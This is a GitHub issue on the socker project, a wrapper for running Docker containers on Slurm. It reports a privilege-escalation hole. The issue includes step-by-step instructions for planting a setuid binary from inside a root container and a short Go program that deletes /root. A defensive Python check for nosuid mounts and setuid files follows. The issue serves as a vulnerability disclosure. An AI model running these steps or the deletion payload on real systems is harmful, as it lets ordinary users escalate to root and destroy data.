unioslo / socker

A wrapper for secure running of Docker containers on Slurm

It is not safe to run the container with root user privileges without any restrictions. #4

Open ansiz opened 6 years ago

ansiz commented 6 years ago

It is not safe to run the container with root user privileges without any restrictions. You mounted the host directory into the container, and common users run as root in the container, so they can perform any dangerous operation with root privileges. For example:

  1. run a container
  2. build a program named hack, put it in the directory you mounted
  3. chmod +xs hack
  4. exit container
  5. cd to the directory, run this program

hack program code (in Golang):

```go
package main

import "os"

func main() {
  os.RemoveAll("/root")
}
```

Using this code, a common user can delete the root directory, and can also perform any dangerous operation in this way.
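A defender-side check for the condition reported above, as an added example that is not part of the issue or of socker's code: it determines whether the host file system behind a bind-mounted directory honours setuid bits (a `nosuid` mount ignores them at exec time) and lists setuid/setgid executables left in that directory. The mountinfo sample is constructed and the `/cluster` paths are hypothetical; on a real host, read `/proc/self/mountinfo` instead.

```python
import os
import stat

# Constructed sample in /proc/self/mountinfo format; the /cluster paths are hypothetical.
SAMPLE_MOUNTINFO = """\
22 1 8:1 / / rw,relatime shared:1 - ext4 /dev/sda1 rw
41 22 0:35 / /cluster/home rw,relatime shared:20 - nfs4 fs1:/home rw
42 22 0:36 / /cluster/work rw,nosuid,nodev shared:21 - nfs4 fs1:/work rw
"""


def mount_for(path, mountinfo):
    """Return (mount_point, options) for the deepest mount containing path."""
    best = ("", set())
    for line in mountinfo.splitlines():
        fields = line.split()
        if len(fields) < 6:
            continue
        mnt, opts = fields[4], set(fields[5].split(","))
        inside = path == mnt or path.startswith(mnt.rstrip("/") + "/")
        if inside and len(mnt) >= len(best[0]):  # later entry wins on a tie
            best = (mnt, opts)
    return best


def honours_setuid(path, mountinfo):
    """True when the mount holding path lacks nosuid, so setuid bits take effect."""
    return "nosuid" not in mount_for(path, mountinfo)[1]


def is_setid_executable(mode):
    """Regular file with setuid or setgid and at least one execute bit."""
    return (stat.S_ISREG(mode)
            and bool(mode & (stat.S_ISUID | stat.S_ISGID))
            and bool(mode & 0o111))


def find_setid_files(root):
    """List (path, owner uid, mode) for setuid/setgid executables under root."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if is_setid_executable(st.st_mode):
                hits.append((full, st.st_uid, oct(stat.S_IMODE(st.st_mode))))
    return hits


if __name__ == "__main__":
    for d in ("/cluster/home/alice", "/cluster/work/job1"):
        print(d, "setuid honoured:", honours_setuid(d, SAMPLE_MOUNTINFO))
```

A hit from `find_setid_files` with owner uid 0 on a mount where `honours_setuid` is true is the situation the report describes.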

ansiz commented 6 years ago

I am also looking for a solution; I hope to discuss it with you.